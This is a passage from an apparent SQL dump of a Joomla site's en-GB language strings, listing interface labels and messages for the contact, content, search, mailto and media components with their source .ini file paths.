Field','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(208,'COM_CONTACT_FILTER_SEARCH_DESC','Contact Filter Search','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(209,'COM_CONTACT_CONTACT_MESSAGE_SUBJECT_DESC','Enter the subject of your message here.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(210,'COM_CONTACT_CONTACT_MESSAGE_SUBJECT_LABEL','Subject','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(211,'COM_CONTACT_CONTACT_SEND','Send Email','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(212,'COM_CONTACT_COPYSUBJECT_OF','Copy of: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(213,'COM_CONTACT_COPYTEXT_OF','This is a copy of the following message you sent to %s via %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(214,'COM_CONTACT_COUNT','Contact count:','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(215,'COM_CONTACT_COUNTRY','Country','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(216,'COM_CONTACT_DEFAULT_PAGE_TITLE','Contacts','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(217,'COM_CONTACT_DETAILS','Contact','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(218,'COM_CONTACT_DOWNLOAD_INFORMATION_AS','Download information as:','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(219,'COM_CONTACT_EMAIL_BANNEDTEXT','The %s of your email has banned text.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(220,'COM_CONTACT_EMAIL_DESC','Email Address for contact.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(221,'COM_CONTACT_EMAIL_FORM','Contact Form','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(222,'COM_CONTACT_EMAIL_LABEL','Email','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(223,'COM_CONTACT_EMAIL_THANKS','Thank you for your email.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(224,'COM_CONTACT_ENQUIRY_TEXT','This is an enquiry email via %s from:','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(225,'COM_CONTACT_ERROR_CONTACT_NOT_FOUND','Contact not found','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(226,'COM_CONTACT_FAX','Fax','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(227,'COM_CONTACT_FAX_NUMBER','Fax: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(228,'COM_CONTACT_FORM_LABEL','Send an Email. All fields with an asterisk (*) are required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(229,'COM_CONTACT_FORM_NC','Please make sure the form is complete and valid.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(230,'COM_CONTACT_IMAGE_DETAILS','Contact image','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(231,'COM_CONTACT_LINKS','Links','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(232,'COM_CONTACT_MAILENQUIRY','%s Enquiry','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(233,'COM_CONTACT_MOBILE','Mobile','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(234,'COM_CONTACT_MOBILE_NUMBER','Mobile: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(235,'COM_CONTACT_NO_CONTACTS','There are no Contacts to display','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(236,'COM_CONTACT_NOT_MORE_THAN_ONE_EMAIL_ADDRESS','You can\'t enter more than one email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(237,'COM_CONTACT_NUM_ITEMS','Contact Count:','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(238,'COM_CONTACT_OPTIONAL','(optional)','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(239,'COM_CONTACT_OTHER_INFORMATION','Miscellaneous Information','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(240,'COM_CONTACT_POSITION','Position','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(241,'COM_CONTACT_PROFILE','Profile','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(242,'COM_CONTACT_PROFILE_HEADING','Contact profile','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(243,'COM_CONTACT_SELECT_CONTACT','Select a contact:','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(244,'COM_CONTACT_SESSION_INVALID','Invalid session cookie. Please check that you have cookies enabled in your web browser.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(245,'COM_CONTACT_STATE','State','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(246,'COM_CONTACT_SUBURB','Suburb','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(247,'COM_CONTACT_TELEPHONE','Phone','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(248,'COM_CONTACT_TELEPHONE_NUMBER','Phone: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(249,'COM_CONTACT_USER_FIELDS','Fields','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(250,'COM_CONTACT_VCARD','vCard','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(251,'COM_CONTENT_ACCESS_DELETE_DESC','Inherited state for <strong>delete actions</strong> on this article and the calculated state based on the menu selection.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(252,'COM_CONTENT_ACCESS_EDIT_DESC','Inherited state for <strong>edit actions</strong> on this article and the calculated state based on the menu selection.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(253,'COM_CONTENT_ACCESS_EDITSTATE_DESC','Inherited state for <strong>edit state actions</strong> on this article and the calculated state based on the menu selection.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(254,'COM_CONTENT_ARTICLE_CONTENT','Content','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(255,'COM_CONTENT_ARTICLE_HITS','Hits: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(256,'COM_CONTENT_ARTICLE_INFO','Details','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(257,'COM_CONTENT_ARTICLE_VOTE_FAILURE','You already rated this article today!','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(258,'COM_CONTENT_ARTICLE_VOTE_SUCCESS','Thank you for rating this article.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(259,'COM_CONTENT_AUTHOR_FILTER_LABEL','Author Filter','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(260,'COM_CONTENT_CAPTCHA_DESC','Please complete the security check.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(261,'COM_CONTENT_CAPTCHA_LABEL','Captcha','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(262,'COM_CONTENT_CATEGORY','Category: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(263,'COM_CONTENT_CATEGORY_LIST_TABLE_CAPTION','List of articles in category %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(264,'COM_CONTENT_CHECKED_OUT_BY','Checked out by %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(265,'COM_CONTENT_CONTENT_TYPE_ARTICLE','Article','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(266,'COM_CONTENT_CONTENT_TYPE_CATEGORY','Article Category','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(267,'COM_CONTENT_CREATE_ARTICLE','Submit new article','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(268,'COM_CONTENT_CREATED_DATE','Created Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(269,'COM_CONTENT_CREATED_DATE_ON','Created: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(270,'COM_CONTENT_EDIT_ITEM','Edit Article','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(271,'COM_CONTENT_ERROR_ARTICLE_NOT_FOUND','Article not found','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(272,'COM_CONTENT_ERROR_LOGIN_TO_VIEW_ARTICLE','Please login to view the article','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(273,'COM_CONTENT_ERROR_PARENT_CATEGORY_NOT_FOUND','Parent category not found','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(274,'COM_CONTENT_FEED_READMORE','Read More ...','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(275,'COM_CONTENT_FIELD_FULL_DESC','Select or upload an image for the single article display.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(276,'COM_CONTENT_FIELD_FULL_LABEL','Full Article Image','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(277,'COM_CONTENT_FIELD_IMAGE_ALT_DESC','Alternative text used for visitors without access to images.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(278,'COM_CONTENT_FIELD_IMAGE_ALT_LABEL','Alt Text','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(279,'COM_CONTENT_FIELD_IMAGE_CAPTION_DESC','Caption attached to the image.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(280,'COM_CONTENT_FIELD_IMAGE_CAPTION_LABEL','Caption','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(281,'COM_CONTENT_FIELD_IMAGE_DESC','The image to be displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(282,'COM_CONTENT_FIELD_INTRO_DESC','Select or upload an image for the intro text layouts such as blogs and featured.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(283,'COM_CONTENT_FIELD_INTRO_LABEL','Intro Image','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(284,'COM_CONTENT_FIELD_NOTE_DESC','An optional note to display in the article list.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(285,'COM_CONTENT_FIELD_NOTE_LABEL','Note','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(286,'COM_CONTENT_FIELD_URL_DESC','Link for display.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(287,'COM_CONTENT_FIELD_URL_LINK_TEXT_DESC','Text to display for the link.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(288,'COM_CONTENT_FIELD_URL_LINK_TEXT_LABEL','Link Text','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(289,'COM_CONTENT_FIELD_URLA_LABEL','Link A','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(290,'COM_CONTENT_FIELD_URLA_LINK_TEXT_LABEL','Link A Text','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(291,'COM_CONTENT_FIELD_URLB_LABEL','Link B','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(292,'COM_CONTENT_FIELD_URLB_LINK_TEXT_LABEL','Link B Text','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(293,'COM_CONTENT_FIELD_URLC_LABEL','Link C','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(294,'COM_CONTENT_FIELD_URLC_LINK_TEXT_LABEL','Link C Text','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(295,'COM_CONTENT_FILTER_SEARCH_DESC','Content Filter Search','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(296,'COM_CONTENT_FLOAT_DESC','Controls placement of the image.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(297,'COM_CONTENT_FLOAT_FULLTEXT_LABEL','Full text image float.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(298,'COM_CONTENT_FLOAT_INTRO_LABEL','Intro Image float','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(299,'COM_CONTENT_FLOAT_LABEL','Image Float','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(300,'COM_CONTENT_FORM_EDIT_ARTICLE','Edit an article','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(301,'COM_CONTENT_FORM_FILTER_LEGEND','Filters','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(302,'COM_CONTENT_FORM_FILTER_SUBMIT','Filter','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(303,'COM_CONTENT_HEADING_TITLE','Title','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(304,'COM_CONTENT_HITS_FILTER_LABEL','Hits Filter','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(305,'COM_CONTENT_IMAGES_AND_URLS','Images and Links','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(306,'COM_CONTENT_INTROTEXT','Article must have some content.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(307,'COM_CONTENT_INVALID_RATING','Article Rating: Invalid Rating: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(308,'COM_CONTENT_LAST_UPDATED','Last Updated: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(309,'COM_CONTENT_LEFT','Left','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(310,'COM_CONTENT_METADATA','Metadata','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(311,'COM_CONTENT_MODAL_FILTER_SEARCH_DESC','Search in title and alias. Prefix with ID: or AUTHOR: to search for an article ID or article author.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(312,'COM_CONTENT_MODAL_FILTER_SEARCH_LABEL','Search Articles','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(313,'COM_CONTENT_MODIFIED_DATE','Modified Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(314,'COM_CONTENT_MONTH','Month','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(315,'COM_CONTENT_MORE_ARTICLES','More Articles ...','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(316,'COM_CONTENT_NEW_ARTICLE','New Article','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(317,'COM_CONTENT_NO_ARTICLES','There are no articles in this category. If subcategories display on this page, they may have articles.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(318,'COM_CONTENT_NONE','None','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(319,'COM_CONTENT_NUM_ITEMS','Article Count:','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(320,'COM_CONTENT_NUM_ITEMS_TIP','Article Count','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(321,'COM_CONTENT_ON_NEW_CONTENT','A new Article has been submitted by \'%1$s\' entitled \'%2$s\'.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(322,'COM_CONTENT_ORDERING','Ordering:<br />New articles default to the first position in the Category. The ordering can be changed in Backend.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(323,'COM_CONTENT_PAGEBREAK_DOC_TITLE','Page Break','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(324,'COM_CONTENT_PAGEBREAK_INSERT_BUTTON','Insert Page Break','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(325,'COM_CONTENT_PAGEBREAK_TITLE','Page Title:','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(326,'COM_CONTENT_PAGEBREAK_TOC','Table of Contents Alias:','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(327,'COM_CONTENT_PARENT','Parent Category: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(328,'COM_CONTENT_PUBLISHED_DATE','Published Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(329,'COM_CONTENT_PUBLISHED_DATE_ON','Published: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(330,'COM_CONTENT_PUBLISHING','Publishing','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(331,'COM_CONTENT_RATINGS','Rating','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(332,'COM_CONTENT_RATINGS_COUNT','Rating: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(333,'COM_CONTENT_READ_MORE','Read more: ','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(334,'COM_CONTENT_READ_MORE_TITLE','Read more ...','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(335,'COM_CONTENT_REGISTER_TO_READ_MORE','Register to read more ...','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(336,'COM_CONTENT_RIGHT','Right','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(337,'COM_CONTENT_SAVE_SUCCESS','Article saved.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(338,'COM_CONTENT_SAVE_WARNING','Alias already existed so a number was added at the end. If you want to change the alias, please contact a site administrator','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(339,'COM_CONTENT_SELECT_AN_ARTICLE','Select an Article','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(340,'COM_CONTENT_SUBMIT_SAVE_SUCCESS','Article submitted.','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(341,'COM_CONTENT_TITLE_FILTER_LABEL','Title Filter','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(342,'COM_CONTENT_VOTES','Vote','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(343,'COM_CONTENT_VOTES_COUNT','Vote: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(344,'COM_CONTENT_WRITTEN_BY','Written by %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_content.ini'),(345,'COM_FINDER','Smart Search','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(346,'COM_FINDER_ADVANCED_SEARCH_TOGGLE','Advanced Search','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(347,'COM_FINDER_ADVANCED_TIPS','<p>Here are a few examples of how you can use the search feature:</p><p>Entering <span class=\"term\">this and that</span> into the search form will return results with both "this" and "that".</p><p>Entering <span class=\"term\">this not that</span> into the search form will return results with "this" and not "that".</p><p>Entering <span class=\"term\">this or that</span> into the search form will return results with either "this" or "that".</p><p>Entering <span class=\"term\">"this and that"</span> (with quotes) into the search form will return results with the exact phrase "this and that".</p><p>Search results can also be filtered using a variety of criteria. Select one or more filters below to get started.</p>','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(348,'COM_FINDER_DEFAULT_PAGE_TITLE','Search Results','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(349,'COM_FINDER_FILTER_BRANCH_LABEL','Search by %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(350,'COM_FINDER_FILTER_DATE_BEFORE','Before','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(351,'COM_FINDER_FILTER_DATE_EXACTLY','Exactly','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(352,'COM_FINDER_FILTER_DATE_AFTER','After','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(353,'COM_FINDER_FILTER_DATE1','Start Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(354,'COM_FINDER_FILTER_DATE1_DESC','Enter a date in YYYY-MM-DD format.','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(355,'COM_FINDER_FILTER_DATE2','End Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(356,'COM_FINDER_FILTER_DATE2_DESC','Enter a date in YYYY-MM-DD format.','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(357,'COM_FINDER_FILTER_SELECT_ALL_LABEL','Search All','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(358,'COM_FINDER_FILTER_WHEN_AFTER','After','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(359,'COM_FINDER_FILTER_WHEN_BEFORE','Before','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(360,'COM_FINDER_QUERY_DATE_CONDITION_AFTER','after','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(361,'COM_FINDER_QUERY_DATE_CONDITION_BEFORE','before','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(362,'COM_FINDER_QUERY_DATE_CONDITION_EXACT','exactly on','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(363,'COM_FINDER_QUERY_END_DATE','ending date <span class=\"when\">%s</span> <span class=\"date\">%s</span>','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(364,'COM_FINDER_QUERY_OPERATOR_AND','and','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(365,'COM_FINDER_QUERY_OPERATOR_OR','or','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(366,'COM_FINDER_QUERY_OPERATOR_NOT','not','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(367,'COM_FINDER_QUERY_FILTER_BRANCH_VENUE','venue','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(368,'COM_FINDER_QUERY_START_DATE','beginning date <span class=\"when\">%s</span> <span class=\"date\">%s</span>','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(369,'COM_FINDER_QUERY_TAXONOMY_NODE','with <span class=\"node\">%s</span> as <span class=\"branch\">%s</span> ','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(370,'COM_FINDER_QUERY_TOKEN_EXCLUDED','<span class=\"term\">%s</span> should be excluded','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(371,'COM_FINDER_QUERY_TOKEN_GLUE',', and ','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(372,'COM_FINDER_QUERY_TOKEN_INTERPRETED','Assuming %s, the following results were found.','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(373,'COM_FINDER_QUERY_TOKEN_OPTIONAL','<span class=\"term\">%s</span> is optional','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(374,'COM_FINDER_QUERY_TOKEN_REQUIRED','<span class=\"term\">%s</span> is required','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(375,'COM_FINDER_SEARCH_NO_RESULTS_BODY','No search results could be found for query: %s.','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(376,'COM_FINDER_SEARCH_NO_RESULTS_BODY_MULTILANG','No search results in English (en-GB) could be found for query: %s.','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(377,'COM_FINDER_SEARCH_NO_RESULTS_HEADING','No Results Found','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(378,'COM_FINDER_SEARCH_RESULTS_OF','Results <strong>%s</strong> - <strong>%s</strong> of <strong>%s</strong>','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(379,'COM_FINDER_SEARCH_SIMILAR','Did you mean: %s?','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(380,'COM_FINDER_SEARCH_TERMS','Search Terms:','/home/smthsmth/public_html/language/en-GB/en-GB.com_finder.ini'),(381,'COM_MAILTO','Mailto','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(382,'COM_MAILTO_CANCEL','Cancel','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(383,'COM_MAILTO_CAPTCHA','Captcha','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(384,'COM_MAILTO_CLOSE_WINDOW','Close Window','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(385,'COM_MAILTO_EMAIL_ERR_NOINFO','Please provide a valid email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(386,'COM_MAILTO_EMAIL_INVALID','The address \'%s\' does not appear to be a valid email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(387,'COM_MAILTO_EMAIL_MSG','This is an email from (%s) sent by %s (%s). You may also find the following link interesting: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(388,'COM_MAILTO_EMAIL_NOT_SENT','Email could not be sent.','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(389,'COM_MAILTO_EMAIL_SENT','Email was sent.','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(390,'COM_MAILTO_EMAIL_TO','Email to','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(391,'COM_MAILTO_EMAIL_TO_A_FRIEND','Email this link to a friend.','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(392,'COM_MAILTO_LINK_IS_MISSING','Link is missing','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(393,'COM_MAILTO_SEND','Send','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(394,'COM_MAILTO_SENDER','Sender','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(395,'COM_MAILTO_SENT_BY','Item sent by %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(396,'COM_MAILTO_SUBJECT','Subject','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(397,'COM_MAILTO_YOUR_EMAIL','Your Email','/home/smthsmth/public_html/language/en-GB/en-GB.com_mailto.ini'),(398,'COM_MEDIA_ALIGN','Image Float','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(399,'COM_MEDIA_ALIGN_DESC','This will apply the classes \'pull-left\', \'pull-center\' or \'pull-right\' to the \'<figure>\' or \'<img>\' element.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(400,'COM_MEDIA_BROWSE_FILES','Browse Files','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(401,'COM_MEDIA_CAPTION','Caption','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(402,'COM_MEDIA_CAPTION_CLASS_LABEL','Caption Class','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(403,'COM_MEDIA_CAPTION_CLASS_DESC','This will apply the entered class to the \'<figcaption>\' element. For example: \'text-left\', \'text-right\', \'text-center\'.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(404,'COM_MEDIA_CLEAR_LIST','Clear List','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(405,'COM_MEDIA_CONFIGURATION','Media: Options','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(406,'COM_MEDIA_CREATE_FOLDER','Create Folder','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(407,'COM_MEDIA_CURRENT_PROGRESS','Current progress','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(408,'COM_MEDIA_DESCFTP','To upload, change and delete media files, Joomla! will most likely need your FTP account details. Please enter them in the form fields below.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(409,'COM_MEDIA_DESCFTPTITLE','FTP Login Details','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(410,'COM_MEDIA_DETAIL_VIEW','Detail View','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(411,'COM_MEDIA_DIRECTORY','Folder','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(412,'COM_MEDIA_DIRECTORY_UP','Folder Up','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(413,'COM_MEDIA_ERROR_BAD_REQUEST','Bad Request','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(414,'COM_MEDIA_ERROR_FILE_EXISTS','File already exists.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(415,'COM_MEDIA_ERROR_UNABLE_TO_CREATE_FOLDER_WARNDIRNAME','Unable to create folder. Folder name must only have alphanumeric characters and no spaces.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(416,'COM_MEDIA_ERROR_UNABLE_TO_BROWSE_FOLDER_WARNDIRNAME','Unable to browse: %s. Folder name must only have alphanumeric characters and no spaces.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(417,'COM_MEDIA_ERROR_UNABLE_TO_DELETE','Unable to delete: ','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(418,'COM_MEDIA_ERROR_UNABLE_TO_DELETE_FILE_WARNFILENAME','Unable to delete: %s. File name must only have alphanumeric characters and no spaces.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(419,'COM_MEDIA_ERROR_UNABLE_TO_DELETE_FOLDER_NOT_EMPTY','Unable to delete: %s. Folder is not 